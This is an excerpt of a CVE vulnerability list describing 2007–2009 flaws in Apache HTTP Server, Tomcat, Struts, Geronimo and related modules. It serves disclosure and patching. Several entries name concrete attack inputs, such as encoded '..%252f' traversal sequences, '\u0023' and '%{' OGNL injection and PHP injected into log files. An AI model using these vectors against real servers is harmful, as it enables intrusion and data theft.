13545| [CVE-2009-1462] The Security Manager in razorCMS before 0.4 does not verify the permissions of every file owned by the apache user account, which is inconsistent with the documentation and allows local users to have an unspecified impact.
13546| [CVE-2009-1275] Apache Tiles 2.1 before 2.1.2, as used in Apache Struts and other products, evaluates Expression Language (EL) expressions twice in certain circumstances, which allows remote attackers to conduct cross-site scripting (XSS) attacks or obtain sensitive information via unspecified vectors, related to the (1) tiles:putAttribute and (2) tiles:insertTemplate JSP tags.
13547| [CVE-2009-1195] The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not properly handle Options=IncludesNOEXEC in the AllowOverride directive, which allows local users to gain privileges by configuring (1) Options Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a .htaccess file, and then inserting an exec element in a .shtml file.
13548| [CVE-2009-1191] mod_proxy_ajp.c in the mod_proxy_ajp module in the Apache HTTP Server 2.2.11 allows remote attackers to obtain sensitive response data, intended for a client that sent an earlier POST request with no request body, via an HTTP request.
13549| [CVE-2009-1012] Unspecified vulnerability in the plug-ins for Apache and IIS web servers in Oracle BEA WebLogic Server 7.0 Gold through SP7, 8.1 Gold through SP6, 9.0, 9.1, 9.2 Gold through MP3, 10.0 Gold through MP1, and 10.3 allows remote attackers to affect confidentiality, integrity, and availability. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on claims from a reliable researcher that this is an integer overflow in an unspecified plug-in that parses HTTP requests, which leads to a heap-based buffer overflow.
13550| [CVE-2009-0918] Multiple unspecified vulnerabilities in DFLabs PTK 1.0.0 through 1.0.4 allow remote attackers to execute arbitrary commands in processes launched by PTK's Apache HTTP Server via (1) "external tools" or (2) a crafted forensic image.
13551| [CVE-2009-0796] Cross-site scripting (XSS) vulnerability in Status.pm in Apache::Status and Apache2::Status in mod_perl1 and mod_perl2 for the Apache HTTP Server, when /perl-status is accessible, allows remote attackers to inject arbitrary web script or HTML via the URI.
13552| [CVE-2009-0783] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.
13553| [CVE-2009-0781] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML."
13554| [CVE-2009-0754] PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows local users to modify behavior of other sites hosted on the same web server by modifying the mbstring.func_overload setting within .htaccess, which causes this setting to be applied to other virtual hosts on the same server.
13555| [CVE-2009-0580] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the (1) MemoryRealm, (2) DataSourceRealm, and (3) JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.
13556| [CVE-2009-0486] Bugzilla 3.2.1, 3.0.7, and 3.3.2, when running under mod_perl, calls the srand function at startup time, which causes Apache children to have the same seed and produce insufficiently random numbers for random tokens, which allows remote attackers to bypass cross-site request forgery (CSRF) protection mechanisms and conduct unauthorized activities as other users.
13557| [CVE-2009-0039] Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to hijack the authentication of administrators for requests that (1) change the web administration password, (2) upload applications, and perform unspecified other administrative actions, as demonstrated by (3) a Shutdown request to console/portal//Server/Shutdown.
13558| [CVE-2009-0038] Multiple cross-site scripting (XSS) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) ip, (3) username, or (4) description parameter to console/portal/Server/Monitoring
13559| [CVE-2009-0033] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service (application outage) via a crafted request with invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header.
13560| [CVE-2009-0026] Multiple cross-site scripting (XSS) vulnerabilities in Apache Jackrabbit before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.jsp or (2) swr.jsp.
13561| [CVE-2009-0023] The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, which triggers a heap-based buffer underflow.
13562| [CVE-2008-6879] Cross-site scripting (XSS) vulnerability in Apache Roller 2.3, 3.0, 3.1, and 4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action.
13563| [CVE-2008-6755] ZoneMinder 1.23.3 on Fedora 10 sets the ownership of /etc/zm.conf to the apache user account, and sets the permissions to 0600, which makes it easier for remote attackers to modify this file by accessing it through a (1) PHP or (2) CGI script.
13564| [CVE-2008-6722] Novell Access Manager 3 SP4 does not properly expire X.509 certificate sessions, which allows physically proximate attackers to obtain a logged-in session by using a victim's web-browser process that continues to send the original and valid SSL sessionID, related to inability of Apache Tomcat to clear entries from its SSL cache.
13565| [CVE-2008-6682] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.x before 2.0.11.1 and 2.1.x before 2.1.1 allow remote attackers to inject arbitrary web script or HTML via vectors associated with improper handling of (1) " (double quote) characters in the href attribute of an s:a tag and (2) parameters in the action attribute of an s:url tag.
13566| [CVE-2008-6505] Multiple directory traversal vulnerabilities in Apache Struts 2.0.x before 2.0.12 and 2.1.x before 2.1.3 allow remote attackers to read arbitrary files via a ..%252f (encoded dot dot slash) in a URI with a /struts/ path, related to (1) FilterDispatcher in 2.0.x and (2) DefaultStaticContentLoader in 2.1.x.
13567| [CVE-2008-6504] ParametersInterceptor in OpenSymphony XWork 2.0.x before 2.0.6 and 2.1.x before 2.1.2, as used in Apache Struts and other products, does not properly restrict # (pound sign) references to context objects, which allows remote attackers to execute Object-Graph Navigation Language (OGNL) statements and modify server-side context objects, as demonstrated by use of a \u0023 representation for the # character.
13568| [CVE-2008-5696] Novell NetWare 6.5 before Support Pack 8, when an OES2 Linux server is installed into the NDS tree, does not require a password for the ApacheAdmin console, which allows remote attackers to reconfigure the Apache HTTP Server via console operations.
13569| [CVE-2008-5676] Multiple unspecified vulnerabilities in the ModSecurity (aka mod_security) module 2.5.0 through 2.5.5 for the Apache HTTP Server, when SecCacheTransformations is enabled, allow remote attackers to cause a denial of service (daemon crash) or bypass the product's functionality via unknown vectors related to "transformation caching."
13570| [CVE-2008-5519] The JK Connector (aka mod_jk) 1.2.0 through 1.2.26 in Apache Tomcat allows remote attackers to obtain sensitive information via an arbitrary request from an HTTP client, in opportunistic circumstances involving (1) a request from a different client that included a Content-Length header but no POST data or (2) a rapid series of requests, related to noncompliance with the AJP protocol's requirements for requests containing Content-Length headers.
13571| [CVE-2008-5518] Multiple directory traversal vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 on Windows allow remote attackers to upload files to arbitrary directories via directory traversal sequences in the (1) group, (2) artifact, (3) version, or (4) fileType parameter to console/portal//Services/Repository (aka the Services/Repository portlet)
13572| [CVE-2008-5515] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through 6.0.18, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request.
13573| [CVE-2008-5457] Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
13574| [CVE-2008-4308] The doRead method in Apache Tomcat 4.1.32 through 4.1.34 and 5.5.10 through 5.5.20 does not return a -1 to indicate when a certain error condition has occurred, which can cause Tomcat to send POST content from one request to a different request.
13575| [CVE-2008-4008] Unspecified vulnerability in the WebLogic Server Plugins for Apache component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2008 CPU. Oracle has not commented on reliable researcher claims that this issue is a stack-based buffer overflow in the WebLogic Apache Connector, related to an invalid parameter.
13576| [CVE-2008-3666] Unspecified vulnerability in Sun Solaris 10 and OpenSolaris before snv_96 allows (1) context-dependent attackers to cause a denial of service (panic) via vectors involving creation of a crafted file and use of the sendfilev system call, as demonstrated by a file served by an Apache 2.2.x web server with EnableSendFile configured
13577| [CVE-2008-3271] Apache Tomcat 5.5.0 and 4.1.0 through 4.1.31 allows remote attackers to bypass an IP address restriction and obtain sensitive information via a request that is processed concurrently with another request but in a different thread, leading to an instance-variable overwrite associated with a "synchronization problem" and lack of thread safety, and related to RemoteFilterValve, RemoteAddrValve, and RemoteHostValve.
13578| [CVE-2008-3257] Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.
13579| [CVE-2008-2939] Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI.
13580| [CVE-2008-2938] Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
13581| [CVE-2008-2742] Unrestricted file upload in the mcpuk file editor (atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php) in Achievo 1.2.0 through 1.3.2 allows remote attackers to execute arbitrary code by uploading a file with .php followed by a safe extension, then accessing it via a direct request to the file in the Achievo root directory. NOTE: this is only a vulnerability in environments that support multiple extensions, such as Apache with the mod_mime module enabled.
13582| [CVE-2008-2717] TYPO3 4.0.x before 4.0.9, 4.1.x before 4.1.7, and 4.2.x before 4.2.1 uses an insufficiently restrictive default fileDenyPattern for Apache, which allows remote attackers to bypass security restrictions and upload configuration files such as .htaccess, or conduct file upload attacks using multiple extensions.
13583| [CVE-2008-2579] Unspecified vulnerability in the WebLogic Server Plugins for Apache, Sun and IIS web servers component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 has unknown impact and remote attack vectors.
13584| [CVE-2008-2384] SQL injection vulnerability in mod_auth_mysql.c in the mod-auth-mysql (aka libapache2-mod-auth-mysql) module for the Apache HTTP Server 2.x, when configured to use a multibyte character set that allows a \ (backslash) as part of the character encoding, allows remote attackers to execute arbitrary SQL commands via unspecified inputs in a login request.
13585| [CVE-2008-2370] Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter.
13586| [CVE-2008-2364] The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses.
13587| [CVE-2008-2168] Cross-site scripting (XSS) vulnerability in Apache 2.2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded URLs that are not properly handled when displaying the 403 Forbidden error page.
13588| [CVE-2008-2025] Cross-site scripting (XSS) vulnerability in Apache Struts before 1.2.9-162.31.1 on SUSE Linux Enterprise (SLE) 11, before 1.2.9-108.2 on SUSE openSUSE 10.3, before 1.2.9-198.2 on SUSE openSUSE 11.0, and before 1.2.9-162.163.2 on SUSE openSUSE 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "insufficient quoting of parameters."
13589| [CVE-2008-1947] Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add.
13590| [CVE-2008-1734] Interpretation conflict in PHP Toolkit before 1.0.1 on Gentoo Linux might allow local users to cause a denial of service (PHP outage) and read contents of PHP scripts by creating a file with a one-letter lowercase alphabetic name, which triggers interpretation of a certain unquoted [a-z] argument as a matching shell glob for this name, rather than interpretation as the literal [a-z] regular-expression string, and consequently blocks the launch of the PHP interpreter within the Apache HTTP Server.
13591| [CVE-2008-1678] Memory leak in the zlib_stateful_init function in crypto/comp/c_zlib.c in libssl in OpenSSL 0.9.8f through 0.9.8h allows remote attackers to cause a denial of service (memory consumption) via multiple calls, as demonstrated by initial SSL client handshakes to the Apache HTTP Server mod_ssl that specify a compression algorithm.
13592| [CVE-2008-1232] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.
13593| [CVE-2008-0869] Cross-site scripting (XSS) vulnerability in BEA WebLogic Workshop 8.1 through SP6 and Workshop for WebLogic 9.0 through 10.0 allows remote attackers to inject arbitrary web script or HTML via a "framework defined request parameter" when using WebLogic Workshop or Apache Beehive NetUI framework with page flows.
13594| [CVE-2008-0732] The init script for Apache Geronimo on SUSE Linux follows symlinks when performing a chown operation, which might allow local users to obtain access to unspecified files or directories.
13595| [CVE-2008-0555] The ExpandCert function in Apache-SSL before apache_1.3.41+ssl_1.59 does not properly handle (1) '/' and (2) '=' characters in a Distinguished Name (DN) in a client certificate, which might allow remote attackers to bypass authentication via a crafted DN that triggers overwriting of environment variables.
13596| [CVE-2008-0457] Unrestricted file upload vulnerability in the FileUpload class running on the Symantec LiveState Apache Tomcat server, as used by Symantec Backup Exec System Recovery Manager 7.0 and 7.0.1, allows remote attackers to upload and execute arbitrary JSP files via unknown vectors.
13597| [CVE-2008-0456] CRLF injection vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks by uploading a file with a multi-line name containing HTTP header sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
13598| [CVE-2008-0455] Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML by uploading a file with a name containing XSS sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
13599| [CVE-2008-0128] The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat before 5.5.21 does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.
13600| [CVE-2008-0005] mod_proxy_ftp in Apache 2.2.x before 2.2.7-dev, 2.0.x before 2.0.62-dev, and 1.3.x before 1.3.40-dev does not define a charset, which allows remote attackers to conduct cross-site scripting (XSS) attacks using UTF-7 encoding.
13601| [CVE-2008-0002] Apache Tomcat 6.0.0 through 6.0.15 processes parameters in the context of the wrong request when an exception occurs during parameter processing, which might allow remote attackers to obtain sensitive information, as demonstrated by disconnecting during this processing in order to trigger the exception.
13602| [CVE-2007-6750] The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris, related to the lack of the mod_reqtimeout module in versions before 2.2.15.
13603| [CVE-2007-6726] Multiple cross-site scripting (XSS) vulnerabilities in Dojo 0.4.1 and 0.4.2, as used in Apache Struts and other products, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) xip_client.html and (2) xip_server.html in src/io/.
13604| [CVE-2007-6514] Apache HTTP Server, when running on Linux with a document root on a Windows share mounted using smbfs, allows remote attackers to obtain unprocessed content such as source files for .php programs via a trailing "\" (backslash), which is not handled by the intended AddType directive.
13605| [CVE-2007-6423] ** DISPUTED ** Unspecified vulnerability in mod_proxy_balancer for Apache HTTP Server 2.2.x before 2.2.7-dev, when running on Windows, allows remote attackers to trigger memory corruption via a long URL. NOTE: the vendor could not reproduce this issue.
13606| [CVE-2007-6422] The balancer_handler function in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6, when a threaded Multi-Processing Module is used, allows remote authenticated users to cause a denial of service (child process crash) via an invalid bb variable.
13607| [CVE-2007-6421] Cross-site scripting (XSS) vulnerability in balancer-manager in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) ss, (2) wr, or (3) rr parameters, or (4) the URL.
13608| [CVE-2007-6420] Cross-site request forgery (CSRF) vulnerability in the balancer-manager in mod_proxy_balancer for Apache HTTP Server 2.2.x allows remote attackers to gain privileges via unspecified vectors.
13609| [CVE-2007-6388] Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13610| [CVE-2007-6361] Gekko 0.8.2 and earlier stores sensitive information under the web root with possibly insufficient access control, which might allow remote attackers to read certain files under temp/, as demonstrated by a log file that records the titles of blog entries. NOTE: access to temp/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
13611| [CVE-2007-6342] SQL injection vulnerability in the David Castro AuthCAS module (AuthCAS.pm) 0.4 for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the SESSION_COOKIE_NAME (session ID) in a cookie.
13612| [CVE-2007-6286] Apache Tomcat 5.5.11 through 5.5.25 and 6.0.0 through 6.0.15, when the native APR connector is used, does not properly handle an empty request to the SSL port, which allows remote attackers to trigger handling of "a duplicate copy of one of the recent requests," as demonstrated by using netcat to send the empty request.
13613| [CVE-2007-6258] Multiple stack-based buffer overflows in the legacy mod_jk2 2.0.3-DEV and earlier Apache module allow remote attackers to execute arbitrary code via a long (1) Host header, or (2) Hostname within a Host header.
13614| [CVE-2007-6231] Multiple PHP remote file inclusion vulnerabilities in tellmatic 1.0.7 allow remote attackers to execute arbitrary PHP code via a URL in the tm_includepath parameter to (1) Classes.inc.php, (2) statistic.inc.php, (3) status.inc.php, (4) status_top_x.inc.php, or (5) libchart-1.1/libchart.php in include/. NOTE: access to include/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
13615| [CVE-2007-6203] Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918.
13616| [CVE-2007-5797] SQLLoginModule in Apache Geronimo 2.0 through 2.1 does not throw an exception for a nonexistent username, which allows remote attackers to bypass authentication via a login attempt with any username not contained in the database.
13617| [CVE-2007-5731] Absolute path traversal vulnerability in Apache Jakarta Slide 2.1 and earlier allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag, a related issue to CVE-2007-5461.
13618| [CVE-2007-5461] Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.
13619| [CVE-2007-5342] The default catalina.policy in the JULI logging component in Apache Tomcat 5.5.9 through 5.5.25 and 6.0.0 through 6.0.15 does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the (1) level, (2) directory, and (3) prefix attributes in the org.apache.juli.FileHandler handler.
13620| [CVE-2007-5333] Apache Tomcat 6.0.0 through 6.0.14, 5.5.0 through 5.5.25, and 4.1.0 through 4.1.36 does not properly handle (1) double quote (") characters or (2) %5C (encoded backslash) sequences in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks. NOTE: this issue exists because of an incomplete fix for CVE-2007-3385.
13621| [CVE-2007-5156] Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload.php in FCKeditor, as used in SiteX CMS 0.7.3.beta, La-Nai CMS, Syntax CMS, Cardinal Cms, and probably other products, allows remote attackers to upload and execute arbitrary PHP code via a file whose name contains ".php." and has an unknown extension, which is recognized as a .php file by the Apache HTTP server, a different vulnerability than CVE-2006-0658 and CVE-2006-2529.
13622| [CVE-2007-5085] Unspecified vulnerability in the management EJB (MEJB) in Apache Geronimo before 2.0.2 allows remote attackers to bypass authentication and obtain "access to Geronimo internals" via unspecified vectors.
13623| [CVE-2007-5000] Cross-site scripting (XSS) vulnerability in the (1) mod_imap module in the Apache HTTP Server 1.3.0 through 1.3.39 and 2.0.35 through 2.0.61 and the (2) mod_imagemap module in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13624| [CVE-2007-4724] Cross-site request forgery (CSRF) vulnerability in cal2.jsp in the calendar examples application in Apache Tomcat 4.1.31 allows remote attackers to add events as arbitrary users via the time and description parameters.
13625| [CVE-2007-4723] Directory traversal vulnerability in Ragnarok Online Control Panel 4.3.4a, when the Apache HTTP Server is used, allows remote attackers to bypass authentication via directory traversal sequences in a URI that ends with the name of a publicly available page, as demonstrated by a "/...../" sequence and an account_manage.php/login.php final component for reaching the protected account_manage.php page.
13626| [CVE-2007-4641] Directory traversal vulnerability in index.php in Pakupaku CMS 0.4 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting code into an Apache log file.
13627| [CVE-2007-4556] Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
13628| [CVE-2007-4548] The login method in LoginModule implementations in Apache Geronimo 2.0 does not throw FailedLoginException for failed logins, which allows remote attackers to bypass authentication requirements, deploy arbitrary modules, and gain administrative access by sending a blank username and password with the command line deployer in the deployment module.
13629| [CVE-2007-4465] Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection.
13630| [CVE-2007-3847] The date handling code in modules/proxy/proxy_util.c (mod_proxy) in Apache 2.3.0, when using a threaded MPM, allows remote origin servers to cause a denial of service (caching forward proxy process crash) via crafted date headers that trigger a buffer over-read.
13631| [CVE-2007-3571] The Apache Web Server as used in Novell NetWare 6.5 and GroupWise allows remote attackers to obtain sensitive information via a certain directive to Apache that causes the HTTP-Header response to be modified, which may reveal the server's internal IP address.
13632| [CVE-2007-3386] Cross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action.
13633| [CVE-2007-3385] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 does not properly handle the \" character sequence in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks.
13634| [CVE-2007-3384] Multiple cross-site scripting (XSS) vulnerabilities in examples/servlet/CookieExample in Apache Tomcat 3.3 through 3.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Value field, related to error messages.
13635| [CVE-2007-3383] Cross-site scripting (XSS) vulnerability in SendMailServlet in the examples web application (examples/jsp/mail/sendmail.jsp) in Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.36 allows remote attackers to inject arbitrary web script or HTML via the From field and possibly other fields, related to generation of error messages.
13636| [CVE-2007-3382] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 treats single quotes ("'") as delimiters in cookies, which might cause sensitive information such as session IDs to be leaked and allow remote attackers to conduct session hijacking attacks.
13637| [CVE-2007-3304] Apache httpd 1.3.37, 2.0.59, and 2.2.4 with the Prefork MPM module, allows local users to cause a denial of service by modifying the worker_score and process_score arrays to reference an arbitrary process ID, which is sent a SIGUSR1 signal from the master process, aka "SIGUSR1 killer."
13638| [CVE-2007-3303] Apache httpd 2.0.59 and 2.2.4, with the Prefork MPM module, allows local users to cause a denial of service via certain code sequences executed in a worker process that (1) stop request processing by killing all worker processes and preventing creation of replacements or (2) hang the system by forcing the master process to fork an arbitrarily large number of worker processes. NOTE: This might be an inherent design limitation of Apache with respect to worker processes in hosted environments.
13639| [CVE-2007-3101] Multiple cross-site scripting (XSS) vulnerabilities in certain JSF applications in Apache MyFaces Tomahawk before 1.1.6 allow remote attackers to inject arbitrary web script via the autoscroll parameter, which is injected into Javascript that is sent to the client.
13640| [CVE-2007-2450] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Manager and (2) Host Manager web applications in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors.
13641| [CVE-2007-2449] Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the '
13642| [CVE-2007-2353] Apache Axis 1.0 allows remote attackers to obtain sensitive information by requesting a non-existent WSDL file, which reveals the installation path in the resulting exception message.
13643| [CVE-2007-2025] Unrestricted file upload vulnerability in the UpLoad feature (lib/plugin/UpLoad.php) in PhpWiki 1.3.11p1 allows remote attackers to upload arbitrary PHP files with a double extension, as demonstrated by .php.3, which is interpreted by Apache as being a valid PHP file.
13644| [CVE-2007-1863] cache_util.c in the mod_cache module in Apache HTTP Server (httpd), when caching is enabled and a threaded Multi-Processing Module (MPM) is used, allows remote attackers to cause a denial of service (child processing handler crash) via a request with the (1) s-maxage, (2) max-age, (3) min-fresh, or (4) max-stale Cache-Control headers without a value.
13645| [CVE-2007-1862] The recall_headers function in mod_mem_cache in Apache 2.2.4 does not properly copy all levels of header data, which can cause Apache to return HTTP headers containing previously used data, which could be used by remote attackers to obtain potentially sensitive information.
13646| [CVE-2007-1860] mod_jk in Apache Tomcat JK Web Server Connector 1.2.x before 1.2.23 decodes request URLs within the Apache HTTP Server before passing the URL to Tomcat, which allows remote attackers to access protected pages via a crafted prefix JkMount, possibly involving double-encoded .. (dot dot) sequences and directory traversal, a related issue to CVE-2007-0450.
13647| [CVE-2007-1858] The default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.
13648| [CVE-2007-1842] Directory traversal vulnerability in login.php in JSBoard before 2.0.12 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the table parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, a related issue to CVE-2006-2019.
13649| [CVE-2007-1801] Directory traversal vulnerability in inc/lang.php in sBLOG 0.7.3 Beta allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the conf_lang_default parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by inc/lang.php.
13650| [CVE-2007-1743] suexec in Apache HTTP Server (httpd) 2.2.3 does not verify combinations of user and group IDs on the command line, which might allow local users to leverage other vulnerabilities to create arbitrary UID/GID owned files if /proc is mounted. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root." In addition, because this is dependent on other vulnerabilities, perhaps this is resultant and should not be included in CVE.
